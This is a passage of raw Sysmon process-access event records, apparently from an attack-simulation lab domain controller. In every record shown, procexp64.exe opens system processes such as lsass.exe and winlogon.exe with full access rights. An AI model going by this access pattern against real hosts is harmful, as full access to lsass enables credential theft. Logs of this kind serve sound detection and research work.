15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784433Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784432Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784431Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784430Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784429Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784428Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784427Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784426Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784425Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784424Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784423Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784422Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784483Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784482Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784481Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784480Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784479Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784478Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784477Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784476Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784475Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784474Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784473Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:37.987{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784545Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784544Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784543Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784542Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784541Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784540Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784539Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784538Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784537Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784536Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784535Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784534Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784533Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784532Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet 